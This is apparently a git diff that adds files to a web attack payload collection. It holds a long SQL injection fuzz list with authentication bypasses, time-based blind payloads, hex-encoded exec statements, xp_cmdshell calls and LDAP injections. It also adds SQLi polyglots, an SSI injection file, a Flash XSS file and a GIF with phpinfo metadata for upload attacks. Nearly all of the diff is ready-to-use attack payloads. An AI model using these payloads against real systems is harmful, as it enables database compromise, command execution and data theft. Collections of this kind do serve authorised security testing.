+having +a' +" or isNULL(1/0) /* +declare @s varchar (8000) select @s = 0x73656c ... +‘ or 1=1 -- +char%4039%41%2b%40SELECT +order by +bfilename + having 1=1-- +) or benchmark(10000000,MD5(1))# + or username like char(37); +;waitfor delay '0:0:__TIME__'-- +" or 1=1-- +x' AND userid IS NULL; -- +*/* + or 'text' > 't' + (select top 1 + or benchmark(10000000,MD5(1))# +");waitfor delay '0:0:__TIME__'-- +a' or 3=3-- + -- &password= + group by userid having 1=1-- + or ''=' +; exec master..xp_cmdshell +%20or%20x=x +select +")) or sleep(__TIME__)=" +0x730065006c0065006300740020004000400076006500 ... +hi' or 1=1 -- +") or pg_sleep(__TIME__)-- +%20or%20'x'='x + or 'something' = 'some'+'thing' +exec sp +29 % +( +ý or 1=1 -- +1 or pg_sleep(__TIME__)-- +0 or 1=1 +) or (a=a +uni/**/on sel/**/ect +replace +%27%20or%201=1 +)) or pg_sleep(__TIME__)-- +%7C +x' AND 1=(SELECT COUNT(*) FROM tabname); -- +'%20OR +; or '1'='1' +declare @q nvarchar (200) select @q = 0x770061 ... +1 or 1=1 +; exec ('sel' + 'ect us' + 'er') +23 OR 1=1 +/ +anything' OR 'x'='x +declare @q nvarchar (4000) select @q = +or 0=0 -- +desc +||'6 +) +1)) or sleep(__TIME__)# +or 0=0 # + select name from syscolumns where id = (sele ... +hi or a=a +*(|(mail=*)) +password:*/=1-- +distinct +);waitfor delay '0:0:__TIME__'-- +to_timestamp_tz +") or benchmark(10000000,MD5(1))# + UNION SELECT +%2A%28%7C%28mail%3D%2A%29%29 ++sqlvuln + or 1=1 /* +)) or sleep(__TIME__)=' +or 1=1 or ""= + or 1 in (select @@version)-- +sqlvuln; + union select * from users where login = char ... +x' or 1=1 or 'x'='y +28 % +‘ or 3=3 -- +@variable + or '1'='1'-- +"a"" or 1=1--" +//* +%2A%7C +" or 0=0 -- +")) or pg_sleep(__TIME__)-- +? + or 1/* +! +' + or a = a +declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) +declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) +declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) +declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) +' or 1=1 + or 1=1 -- +x' OR full_name LIKE '%Bob% +'; exec master..xp_cmdshell 'ping 172.10.1.255'-- +'%20or%20''=' +'%20or%20'x'='x +')%20or%20('x'='x +' or 0=0 -- +' or 0=0 # + or 0=0 #" +' or 1=1-- +' or '1'='1'-- +' or 1 --' +or 1=1-- +' or 1=1 or ''=' + or 1=1 or ""= +' or a=a-- + or a=a +') or ('a'='a +'hi' or 'x'='x'; +or +procedure +handler +' or username like '% +' or uname like '% +' or userid like '% +' or uid like '% +' or user like '% +'; exec master..xp_cmdshell +'; exec xp_regread +t'exec master..xp_cmdshell 'nslookup www.google.com'-- +--sp_password +' UNION SELECT +' UNION ALL SELECT +' or (EXISTS) +' (select top 1 +'||UTL_HTTP.REQUEST +1;SELECT%20* +<>"'%;)(&+ +'%20or%201=1 +'sqlattempt1 +%28 +%29 +%26 +%21 +' or ''=' +' or 3=3 + or 3=3 -- diff --git a/SQL injection/Payloads/SQLi_Polyglots.txt b/SQL injection/Payloads/SQLi_Polyglots.txt new file mode 100644 index 0000000..4cc9d80 --- /dev/null +++ b/SQL injection/Payloads/SQLi_Polyglots.txt @@ -0,0 +1,2 @@ +SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ +SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample diff --git a/Template injections/JHADDIX_SSI_Injection.txt b/Template injections/JHADDIX_SSI_Injection.txt new file mode 100644 index 0000000..9b7ba08 --- /dev/null +++ b/Template injections/JHADDIX_SSI_Injection.txt @@ -0,0 +1,75 @@ +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/Upload insecure files/Insecure Flash/xssproject.swf b/Upload insecure files/Insecure Flash/xssproject.swf new file mode 100644 index 0000000000000000000000000000000000000000..a0e7b36ce12df577b2d2a4a4987610596dfced2e GIT binary patch literal 1053 zcmV+&1mgQcS5ppY1^@tf0cBL(Qrkup-qqTc|78O);6S4^G>!?jWWz9nA)ZnU8EzmG zUnIkz@hs8`E0MJtNycV6nZ8LUz3FT80dnJBv=7j$&h(=06QnDNAWSr)pFQV0-+pJ$ zIU0l5UjXEP1z-t+PH`Ck@YDP!2*94B>8;nDBXK-1Ew{y1FDiY{vs;oh8jb3s%{p~1 zrN++AjwCmwX0yf+HTT-`@VI8VPb%$zphH~MF>KGEmgp1W3p(^(R4O;DntDrW4;?e0 z)KrO>WI!y>l^XR1Bhu8CPMrbv+Ss;DL&ZLwG_JXQs=goLD^k-5M7}z8m6G*ux9caQnn* z53TnW9a#Y?vica+A=sm{h%YwZZ({3mh%ZU|@Fa-7T?ZPmN7^U!N^Hm*VpDE3Lm9qx zPx4Rq&S~FRSOME0Ul=Z*oYr3Lce`&+Uw6PnU{#*EI)%T{9ys7WfBt-yM$DC9cP#PC zS%}KupZ{sGp7@l0+wHz`=sTi%;J1Zr3;<>YcZ>y4_d}lF1u6%v^A1&qK}khyX=0an zo?%_O=lj~gungC8{6k@@uvDy;;txZ^)QBT))wj)SY zcbyG7qV8V19vQ&(3^q+V>d*l;tm5I=BaVg5V~f3Ytde{PCO7uE0e0Lzi#QysBxqe% zkgK~NSl_ArXQcY$huxS%sh2h>W)hDrou+N<-~nNLF89tAB1uf(n*8{tp`vEm?`}#> zS>Bc|Seoo87D5G@;o2s?Zgp*z16i9jc0%Xrg@5`7lnt6;5$Dk?D98z`o^eG&;KNz} z49QC9BUk>cwGRE4@AuOr4kt-5l^sI-&~c~(Nt_i)B@d$1r06p@vq>V9p9lpA_jqqA z6K2`{Yi!gp+#I5rTg?7;!RG?8DjsX{0%^#4QC;v;uXw!5?w3 zI?X6ZM^ABVn)g38vPxW!>j|CLlOH#hJ|3kQL@2BPFp++U}qw;Z4(42f-cBPK`+QkQ7_8MoIWQj^ZLB3Lai&_BzxOxzo@M?&Q^o1D7wiO2 literal 0 HcmV?d00001 diff --git a/Upload insecure files/Metadata GIF/phpinfo-metadata.gif b/Upload insecure files/Metadata GIF/phpinfo-metadata.gif new file mode 100644 index 0000000000000000000000000000000000000000..67f5d453f425901f92a6cc56e6cb2d5eef220ebb GIT binary patch literal 7420 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 